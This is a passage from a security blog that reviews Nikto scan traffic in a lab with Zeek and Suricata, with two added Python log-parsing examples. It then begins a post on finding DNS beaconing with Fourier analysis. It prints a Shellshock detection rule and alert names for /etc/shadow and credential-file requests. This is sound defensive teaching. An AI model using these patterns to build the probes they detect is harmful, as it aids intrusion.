<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</span>
<span style="font-weight: bold;">Connection</span><span>:</span> <span>Keep-Alive</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.0.0.106</span>
1443
HTTP/1.1 200 OK
Date: Thu, 11 May 2023 20:07:42 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Content-Length: 1214
Keep-Alive: timeout=5, max=35
Connection: Keep-Alive</span>
</pre></div>
</div><div><br /></div><div><div>Looks like we found one entry where the response was successful. This in turn ties into what we found via our log analysis.</div><div><br /></div><div>Closing out the packet analysis.</div></div><div><br /></div><div><div><b><span style="font-size: medium;">Detect - Zeek Analysis</span></b></div></div><div><br /></div><div><div>Set up Zeek</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff]</span>
<span style="color: white;">└─$ sudo zeek --iface any --no-checksums</span>
</pre></div>
</div><div><br /></div><div><div>What logs were created for this activity?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff]</span>
<span style="color: white;">└─$ ls</span>
<span style="color: white;">conn.log dhcp.log dns.log files.log http.log packet_filter.log reporter.log weird.log</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the <i>http.log</i> file to see what communication is there with response code 200.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff]</span>
<span style="color: white;">└─$ cat http.log | grep --perl-regexp '\s+200\s+' | awk --field-separator=' ' '{ print $1" " $3":"$4 " " $5":"$6 " " $8 " " $9 " " $10 }' </span>
<span style="color: white;">1683835691.086935 10.0.0.107:37570 10.0.0.106:80 GET 10.0.0.106 /favicon.ico</span>
<span style="color: white;">1683835691.585128 10.0.0.107:37616 10.0.0.106:80 OPTIONS 10.0.0.106 *</span>
<span style="color: white;">1683835691.592865 10.0.0.107:37630 10.0.0.106:80 TRACE - /</span>
<span style="color: white;">1683835692.447548 10.0.0.107:37658 10.0.0.106:80 GET 10.0.0.106 /img/</span>
</pre></div>
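As an added example (not part of the post), here is a header-aware Python equivalent of what zeek-cut would do for the query above: it reads the #fields line of http.log and filters on the status_code column, whereas a grep for '\s+200\s+' also matches a 200 sitting in any other column (a body length, for instance). The http.log content is constructed to mirror the four hits above, plus one 404 whose response_body_len happens to be 200.

```python
"""Header-aware filter for Zeek http.log (added example, not from the post).

Zeek logs carry their column names in a '#fields' header line. Reading it
lets us select status_code specifically, the way zeek-cut would, instead of
matching a bare 200 anywhere on the line. The log below is constructed for
this example with a subset of the real http.log columns.
"""
import re
from typing import Dict, Iterator, List

# Constructed sample in Zeek TSV format (subset of the real http.log fields).
SAMPLE_HTTP_LOG = """#separator \\x09
#set_separator\t,
#empty_field\t(empty)
#unset_field\t-
#path\thttp
#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\ttrans_depth\tmethod\thost\turi\tresponse_body_len\tstatus_code\tstatus_msg
#types\ttime\tstring\taddr\tport\taddr\tport\tcount\tstring\tstring\tstring\tcount\tcount\tstring
1683835691.086935\tCabc1\t10.0.0.107\t37570\t10.0.0.106\t80\t1\tGET\t10.0.0.106\t/favicon.ico\t318\t200\tOK
1683835691.585128\tCabc2\t10.0.0.107\t37616\t10.0.0.106\t80\t1\tOPTIONS\t10.0.0.106\t*\t0\t200\tOK
1683835691.592865\tCabc3\t10.0.0.107\t37630\t10.0.0.106\t80\t1\tTRACE\t-\t/\t187\t200\tOK
1683835691.700000\tCabc4\t10.0.0.107\t37640\t10.0.0.106\t80\t1\tGET\t10.0.0.106\t/cgi-bin/test.cgi\t200\t404\tNot Found
1683835692.447548\tCabc5\t10.0.0.107\t37658\t10.0.0.106\t80\t1\tGET\t10.0.0.106\t/img/\t1214\t200\tOK
#close\t2023-05-11-16-08-20
"""


def parse_zeek_log(text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per record, keyed by the names in the '#fields' header."""
    fields: List[str] = []
    for line in text.splitlines():
        if not line:
            continue
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
            continue
        if line.startswith("#"):
            continue  # separator, types, open/close lines carry no records
        if not fields:
            raise ValueError("record seen before #fields header")
        values = line.split("\t")
        if len(values) != len(fields):
            raise ValueError(f"expected {len(fields)} columns, got {len(values)}")
        yield dict(zip(fields, values))


def zeek_cut(text: str, *columns: str) -> List[List[str]]:
    """zeek-cut equivalent: project every record onto the named columns."""
    return [[rec[c] for c in columns] for rec in parse_zeek_log(text)]


def successful_requests(text: str) -> List[str]:
    """Records whose status_code is exactly 200, printed like the awk output above."""
    out = []
    for rec in parse_zeek_log(text):
        if rec["status_code"] != "200":
            continue
        out.append(
            f'{rec["ts"]} {rec["id.orig_h"]}:{rec["id.orig_p"]} '
            f'{rec["id.resp_h"]}:{rec["id.resp_p"]} {rec["method"]} {rec["host"]} {rec["uri"]}'
        )
    return out


def naive_grep_200(text: str) -> List[str]:
    """The grep -P '\\s+200\\s+' approach, for comparison: any column equal to 200."""
    return [line for line in text.splitlines()
            if not line.startswith("#") and re.search(r"\s+200\s+", line)]


if __name__ == "__main__":
    for row in successful_requests(SAMPLE_HTTP_LOG):
        print(row)
    print(len(naive_grep_200(SAMPLE_HTTP_LOG)), "lines matched by the bare grep")
```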
</div><div><br /></div><div><div>The last one matters the most, as we can see the "<i>/img/</i>".</div><div><br /></div><div>In the other logs, there is nothing meaningful.</div><div><br /></div><div>P.S. It would have been a lot easier to use <i>zeek-cut</i> to answer the above, but <i>zeek-cut</i> is not available on Kali and I'm only interested in solving my problem, not in a particular tool.</div></div><div><br /></div><div><div><b><span style="font-size: medium;"><br /></span></b></div><div><b><span style="font-size: medium;">Detect - Suricata (IDS) Analysis</span></b></div></div><div><br /></div><div><div>Set up Suricata to operate in IDS mode</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/var/log/suricata]</span>
<span style="color: white;">└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l /var/log/suricata/ --simulate-ips -k all</span>
</pre></div>
</div><div><br /></div><div><div>How many alerts triggered for this activity?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ cat fast.log.1 | grep --perl-regexp '\[\*\*\].*?\[\**\]' --only-matching | wc --lines </span>
<span style="color: white;">65</span>
</pre></div>
</div><div><br /></div><div><div>What about unique alerts?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ cat fast.log.1 | grep --perl-regexp '\[\*\*\].*?\[\**\]' --only-matching | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sort --unique | wc --lines</span>
<span style="color: white;">18</span>
</pre></div>
</div><div><br /></div><div><div>Looking at those 18 alerts and their frequency.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ cat fast.log.1 | grep --perl-regexp '\[\*\*\].*?\[\**\]' --only-matching | sort | uniq --count | sort --numeric-sort --reverse </span>
<span style="color: white;"> 38 [**] [1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt [**]</span>
<span style="color: white;"> 5 [**] [1:2101201:11] GPL WEB_SERVER 403 Forbidden [**]</span>
<span style="color: white;"> 3 [**] [1:2101877:11] GPL WEB_SERVER printenv access [**]</span>
<span style="color: white;"> 3 [**] [1:2100977:15] GPL EXPLOIT .cnf access [**]</span>
<span style="color: white;"> 2 [**] [1:2019904:5] ET EXPLOIT QNAP Shellshock CVE-2014-6271 [**]</span>
<span style="color: white;"> 2 [**] [1:2009485:7] ET WEB_SERVER /etc/shadow Detected in URI [**]</span>
<span style="color: white;"> 1 [**] [1:2260002:1] SURICATA Applayer Detect protocol only one direction [**]</span>
<span style="color: white;"> 1 [**] [1:2221028:1] SURICATA HTTP Host header invalid [**]</span>
<span style="color: white;"> 1 [**] [1:2102073:7] GPL WEB_SERVER globals.pl access [**]</span>
<span style="color: white;"> 1 [**] [1:2101402:9] GPL EXPLOIT iissamples access [**]</span>
<span style="color: white;"> 1 [**] [1:2101401:11] GPL EXPLOIT /msadc/samples/ access [**]</span>
<span style="color: white;"> 1 [**] [1:2101013:12] GPL EXPLOIT fpcount access [**]</span>
<span style="color: white;"> 1 [**] [1:2100952:10] GPL WEB_SERVER author.exe access [**]</span>
<span style="color: white;"> 1 [**] [1:2044504:1] ET INFO Request for Visual Studio Code sftp.json - Possible Information Leak [**]</span>
<span style="color: white;"> 1 [**] [1:2034253:2] ET SCAN FTPSync Settings Disclosure Attempt [**]</span>
<span style="color: white;"> 1 [**] [1:2015940:4] ET SCAN SFTP/FTP Password Exposure via sftp-config.json [**]</span>
<span style="color: white;"> 1 [**] [1:2010766:12] ET POLICY Proxy TRACE Request - inbound [**]</span>
<span style="color: white;"> 1 [**] [1:2006445:14] ET WEB_SERVER Possible SQL Injection Attempt SELECT FROM [**]</span>
</pre></div>
</div><div><br /></div><div><div>What are the priorities of these alerts?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ cat fast.log.1 | grep --perl-regexp '\[Priority.*?\]' --only-matching | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sort | uniq --count </span>
<span style="color: white;"> 43 [Priority: 1]</span>
<span style="color: white;"> 20 [Priority: 2]</span>
<span style="color: white;"> 2 [Priority: 3]</span>
</pre></div>
</div><div><br /></div><div><div>The majority of alerts are priority 1. Hmmm!</div><div><br /></div><div>Looking at the classifications.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ cat fast.log.1 | grep --perl-regexp '\[Classification.*?\]' --only-matching | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sort | uniq --count | sort --numeric-sort --reverse </span>
<span style="color: white;"> 40 [Classification: Attempted Administrator Privilege Gain]</span>
<span style="color: white;"> 9 [Classification: Attempted Information Leak]</span>
<span style="color: white;"> 9 [Classification: access to a potentially vulnerable web application]</span>
<span style="color: white;"> 3 [Classification: Web Application Attack]</span>
<span style="color: white;"> 2 [Classification: Potentially Bad Traffic]</span>
<span style="color: white;"> 2 [Classification: Generic Protocol Command Decode]</span>
</pre></div>
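The alert, priority and classification counts above come from grep and uniq over fast.log. As an added example that is not from the post, the same summaries from parsed fast.log records in Python, with the classification, priority and endpoints as proper fields rather than substrings; the alert lines are constructed using signatures that appear in the output above.

```python
"""Parse Suricata fast.log and reproduce the post's alert summaries (added example).

Each fast.log line carries a timestamp, [gid:sid:rev], the rule message,
an optional classification, a priority, the protocol and the flow. Parsing
it once gives every answer the post derived with grep | sort | uniq -c.
The alert lines below are constructed for this example.
"""
import re
from collections import Counter
from typing import Dict, List

SAMPLE_FAST_LOG = """\
05/11/2023-16:07:41.104512  [**] [1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 10.0.0.107:37600 -> 10.0.0.106:80
05/11/2023-16:07:41.104890  [**] [1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 10.0.0.107:37600 -> 10.0.0.106:80
05/11/2023-16:07:41.105301  [**] [1:2019904:5] ET EXPLOIT QNAP Shellshock CVE-2014-6271 [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 10.0.0.107:37600 -> 10.0.0.106:80
05/11/2023-16:07:41.221004  [**] [1:2101201:11] GPL WEB_SERVER 403 Forbidden [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 10.0.0.106:80 -> 10.0.0.107:37550
05/11/2023-16:07:41.585128  [**] [1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 10.0.0.107:37616 -> 10.0.0.106:80
05/11/2023-16:07:41.592865  [**] [1:2010766:12] ET POLICY Proxy TRACE Request - inbound [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 10.0.0.107:37630 -> 10.0.0.106:80
05/11/2023-16:07:41.610042  [**] [1:2221028:1] SURICATA HTTP Host header invalid [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 10.0.0.107:37634 -> 10.0.0.106:80
05/11/2023-16:07:41.700133  [**] [1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 10.0.0.107:37600 -> 10.0.0.106:80
"""

FAST_LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+\[\*\*\]\s+\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+"
    r"(?P<msg>.*?)\s+\[\*\*\]\s+"
    r"(?:\[Classification:\s+(?P<classification>[^\]]+)\]\s+)?"  # tolerated if absent
    r"\[Priority:\s+(?P<priority>\d+)\]\s+"
    r"\{(?P<proto>[^}]+)\}\s+(?P<src>\S+)\s+->\s+(?P<dst>\S+)\s*$"
)


def parse_fast_log(text: str) -> List[Dict[str, str]]:
    """One dict per alert line; a malformed line raises instead of being dropped."""
    alerts = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        m = FAST_LOG_RE.match(line)
        if not m:
            raise ValueError(f"line {lineno}: not a fast.log alert: {line!r}")
        rec = m.groupdict()
        rec["classification"] = rec["classification"] or "(none)"
        alerts.append(rec)
    return alerts


def alert_summary(alerts: List[Dict[str, str]]) -> Dict[str, object]:
    """Total alerts, unique signatures, and the priority/classification breakdowns."""
    return {
        "total": len(alerts),
        "unique_signatures": len({a["sid"] for a in alerts}),
        "by_priority": Counter(a["priority"] for a in alerts),
        "by_classification": Counter(a["classification"] for a in alerts),
    }


def signatures_in_class(alerts: List[Dict[str, str]], classification: str) -> Counter:
    """Which signatures and flows produced a classification: count per (sid, msg, src, dst),
    the same grouping the post gets from 'cut --fields=3- | sort | uniq --count'."""
    return Counter(
        (a["sid"], a["msg"], a["src"], a["dst"])
        for a in alerts if a["classification"] == classification
    )


if __name__ == "__main__":
    parsed = parse_fast_log(SAMPLE_FAST_LOG)
    print(alert_summary(parsed))
    for key, n in signatures_in_class(parsed, "Attempted Administrator Privilege Gain").most_common():
        print(n, *key)
```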
</div><div><br /></div><div><div>What alerts are associated with "<i>Attempted Administrator Privilege Gain</i>"?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ cat fast.log.1 | grep --perl-regexp 'Attempted Administrator Privilege Gain' | cut --fields=3- --delimiter=' ' |sort | uniq --count | sort --numeric-sort --reverse </span>
<span style="color: white;"> 26 [**] [1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 10.0.0.107:37600 -> 10.0.0.106:80</span>
<span style="color: white;"> 12 [**] [1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 10.0.0.107:37616 -> 10.0.0.106:80</span>
<span style="color: white;"> 2 [**] [1:2019904:5] ET EXPLOIT QNAP Shellshock CVE-2014-6271 [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 10.0.0.107:37600 -> 10.0.0.106:80</span>
</pre></div>
</div><div><br /></div><div>Looking at the rule for "<i>ET WEB_SERVER Possible CVE-2014-6271 Attempt</i>".</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff]</span>
<span style="color: white;">└─$ cat /var/lib/suricata/rules/suricata.rules | grep "2022028"</span>
<span style="color: white;">alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB_SERVER Possible CVE-2014-6271 Attempt"; flow:established,to_server; content:" HTTP/1."; pcre:"/^[^\r\n]*?HTTP\/1(?:(?!\r?\n\r?\n)[\x20-\x7e\s]){1,500}\n[\x20-\x7e]{1,100}\x3a[\x20-\x7e]{0,500}\x28\x29\x20\x7b/s"; content:"|28 29 20 7b|"; fast_pattern; reference:url,blogs.akamai.com/2014/09/environment-bashing.html; classtype:attempted-admin; sid:2022028; rev:2; metadata:created_at 2015_11_04, updated_at 2019_10_08;)</span>
</pre></div>
</div><div><br /></div><div><div>These all seem to be associated with <i>Shellshock</i>, and since the device this web server is running on is a Windows-based system, I will conclude these are all false positives.</div><div><br /></div><div>Do we have anything relating to "<i>/img</i>" as we saw in the log and packet analysis?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ cat /var/log/suricata/alert-debug.log.1 | grep --ignore-case "img"</span>
</pre></div>
</div><div><br /></div><div><div>Hmm nothing returned.</div><div><br /></div><div>Moving on from the IDS analysis.</div><div><br /></div><div><div><b>Hope you enjoyed the posts in this series:</b></div><div><div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-scanning-for.html" target="_blank">Beginning Nikto - Scanning for interesting files seen in the logs</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-misconfiguration.html" target="_blank">Beginning Nikto - Misconfiguration / Default File - with evasion type 1 -> Random URI encoding (non-UTF8)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Information Disclosure with evasion type 2 -> Directory self-reference (/./)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Injection (XSS/Script/HTML) - with evasion type 3 -> Premature URL ending</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Remote File Retrieval with evasion type 4 -> Prepend long random string</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Command Execution / Remote Shell</a> </div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - SQL Injection with default evasion</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - File Upload Vulnerability testing</a></div></div><div><br /></div></div></div><div><br /></div><div><b>Reference</b>:</div><div><a href="https://github.com/sullo/nikto" target="_blank">https://github.com/sullo/nikto</a></div><div><a 
href="https://github.com/digininja/DVWA" target="_blank">https://github.com/digininja/DVWA</a></div><div><a href="https://security.stackexchange.com/questions/185457/nikto-this-might-be-interesting-file-redirects" target="_blank">https://security.stackexchange.com/questions/185457/nikto-this-might-be-interesting-file-redirects</a></div><div><a href="https://www.amazon.com/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458" target="_blank">https://www.amazon.com/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458</a></div><div><a href="https://www.amazon.com/Learning-Practicing-Mastering-Network-Forensics/dp/1775383024" target="_blank">https://www.amazon.com/Learning-Practicing-Mastering-Network-Forensics/dp/1775383024</a></div><div><a href="https://hackertarget.com/nikto-tutorial/" target="_blank">https://hackertarget.com/nikto-tutorial/</a></div><div><a href="https://adamtheautomator.com/suricata/" target="_blank">https://adamtheautomator.com/suricata/</a></div><div><a href="https://www.rfc-editor.org/rfc/rfc2616" target="_blank">https://www.rfc-editor.org/rfc/rfc2616</a></div><div><a href="https://serverfault.com/questions/322612/what-exactly-are-propfind-put-delete-requests-and-how-can-i-use-it" target="_blank">https://serverfault.com/questions/322612/what-exactly-are-propfind-put-delete-requests-and-how-can-i-use-it</a></div><div><a href="https://www.rfc-editor.org/rfc/rfc4918" target="_blank">https://www.rfc-editor.org/rfc/rfc4918</a></div><div><a href="https://stackoverflow.com/questions/71142211/what-is-propfind-request" target="_blank">https://stackoverflow.com/questions/71142211/what-is-propfind-request</a></div><div><a href="https://techcommunity.microsoft.com/t5/iis-support-blog/http-track-and-trace-verbs/ba-p/784482" target="_blank">https://techcommunity.microsoft.com/t5/iis-support-blog/http-track-and-trace-verbs/ba-p/784482</a></div><div><a 
href="https://www.oreilly.com/library/view/intrusion-detection-with/157870281X/157870281X_app02lev1sec8.html" target="_blank">https://www.oreilly.com/library/view/intrusion-detection-with/157870281X/157870281X_app02lev1sec8.html</a></div><div><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash" target="_blank">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash</a></div><div><a href="https://nvd.nist.gov/vuln/detail/CVE-2014-6271" target="_blank">https://nvd.nist.gov/vuln/detail/CVE-2014-6271</a></div></div><div><br /></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PEN 2023-10-09T09:22:00.004-07:00 2023-10-12T11:29:55.242-07:00 Beginning Fourier Transform - Detecting Beaconing in our networks<p>Before digging any deeper, I must state, this notebook/post heavily leverages the work done by <a href="https://www.linkedin.com/in/joe-petroske-8a54855/" target="_blank">Joe Petroske</a> on "<a href="https://www.youtube.com/watch?v=twI4pllhElY" target="_blank">Hunting Beacon Activity with Fourier Transforms</a>" along with his notebook on GitHub at <a href="https://github.com/target/Threat-Hunting/blob/master/Beacon%20Hunting/find_beacons_by_fourier.ipynb" target="_blank">https://github.com/target/Threat-Hunting/blob/master/Beacon%20Hunting/find_beacons_by_fourier.ipynb</a>. </p><p>More importantly, it ties together what we teach in the SANS SEC595: Applied Data Science and AI/Machine Learning for Cybersecurity Professionals as it relates to leveraging Fourier Analysis to find beacons: https://www.sans.org/cyber-security-courses/applied-data-science-machine-learning/</p><p>While, as mentioned above, this notebook/post leverages the above content heavily, we will move this from a problem to a solution. 
Meaning, we will start from scratch and then implement the solution, once again, based heavily on Joe's code. This way, when you are about to implement this in your environment, you are clear on how you can solve your problems.</p><p>You can grab the link to my notebook from my <a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Fourrier%20Transform%20for%20Beacon%20Detection%20-%20Blog.ipynb" target="_blank">GitHub</a>:</p><p><span style="font-size: medium;"><b>Issue/Problem/Concern:</b></span></p><p>One day, while capturing some packets for an unrelated issue, I saw the following:</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@peeper:~$ sudo tcpdump -n --interface 2 '(port 53) and not (host 127.0.0.1)' -c 10 </span>
<span style="color: white;">tcpdump: verbose output suppressed, use -v[v]... for full protocol decode </span>
<span style="color: white;">listening on any, link-type EN10MB (Ethernet), snapshot length 262144 bytes </span>
<span style="color: white;">18:39:24.124355 IP 10.0.0.9.46088 > 10.0.0.2.53: 40639+ A? somedomain.securitynik.local. (44) </span>
<span style="color: white;">18:39:24.124604 IP 10.0.0.2.53 > 10.0.0.9.46088: 40639 4/0/0 CNAME somedomain.ca.securitynik.local., CNAME securitynik-something.us-east-1.elb.amazonaws.com., A 172.16.16.55, A 172.16.16.211 (203) </span>
<span style="color: white;">18:39:26.134773 IP 10.0.0.9.50992 > 10.0.0.2.53: 40640+ A? somedomain.securitynik.local. (44) </span>
<span style="color: white;">18:39:26.135072 IP 10.0.0.2.53 > 10.0.0.9.50992: 40640 4/0/0 CNAME somedomain.ca.securitynik.local., CNAME securitynik-something.us-east-1.elb.amazonaws.com., A 172.16.16.211, A 172.16.16.55 (203) </span>
<span style="color: white;">18:39:28.144568 IP 10.0.0.9.49995 > 10.0.0.2.53: 40641+ A? somedomain.securitynik.local. (44) </span>
<span style="color: white;">18:39:28.144829 IP 10.0.0.2.53 > 10.0.0.9.49995: 40641 4/0/0 CNAME somedomain.ca.securitynik.local., CNAME securitynik-something.us-east-1.elb.amazonaws.com., A 172.16.16.55, A 172.16.16.211 (203) </span>
<span style="color: white;">18:39:29.172416 IP 10.0.0.32.41636 > 10.0.0.2.53: 2+ A? pool.ntp.org. (30) </span>
<span style="color: white;">18:39:29.181785 IP 10.0.0.2.53 > 10.0.0.32.41636: 2 4/0/0 A 162.159.200.123, A 137.220.55.232, A 217.180.209.214, A 209.115.181.107 (94)</span>
<span style="color: white;">...</span>
</pre></div>
<p></p><p><span style="font-size: medium;"><b>Did you see anything interesting? </b></span></p><p>I doubt that, at first glance, you saw what the issue is. Do you see the issue now that I have highlighted the time below?</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@peeper:~$ sudo tcpdump -n --interface 2 '(port 53) and not (host 127.0.0.1)' -c 10 </span>
<span style="color: white;">tcpdump: verbose output suppressed, use -v[v]... for full protocol decode </span>
<span style="color: white;">listening on any, link-type EN10MB (Ethernet), snapshot length 262144 bytes </span>
<span><b><span style="color: #fcff01;">**18:39:24**</span></b><span style="color: white;">.124355 IP 10.0.0.9.46088 > 10.0.0.2.53: 40639+ A? somedomain.securitynik.local. (44) </span></span>
<span><b><span style="color: #fcff01;">**18:39:24**</span></b><span style="color: white;">.124604 IP 10.0.0.2.53 > 10.0.0.9.46088: 40639 4/0/0 CNAME somedomain.ca.securitynik.local., CNAME securitynik-something.us-east-1.elb.amazonaws.com., A 172.16.16.55, A 172.16.16.211 (203) </span></span>
<span><b><span style="color: #fcff01;">**18:39:26**</span></b><span style="color: white;">.134773 IP 10.0.0.9.50992 > 10.0.0.2.53: 40640+ A? somedomain.securitynik.local. (44) </span></span>
<span style="color: #fcff01;"><b>**18:39:26**</b></span><span style="color: white;">.135072 IP 10.0.0.2.53 > 10.0.0.9.50992: 40640 4/0/0 CNAME somedomain.ca.securitynik.local., CNAME securitynik-something.us-east-1.elb.amazonaws.com., A 172.16.16.211, A 172.16.16.55 (203) </span>
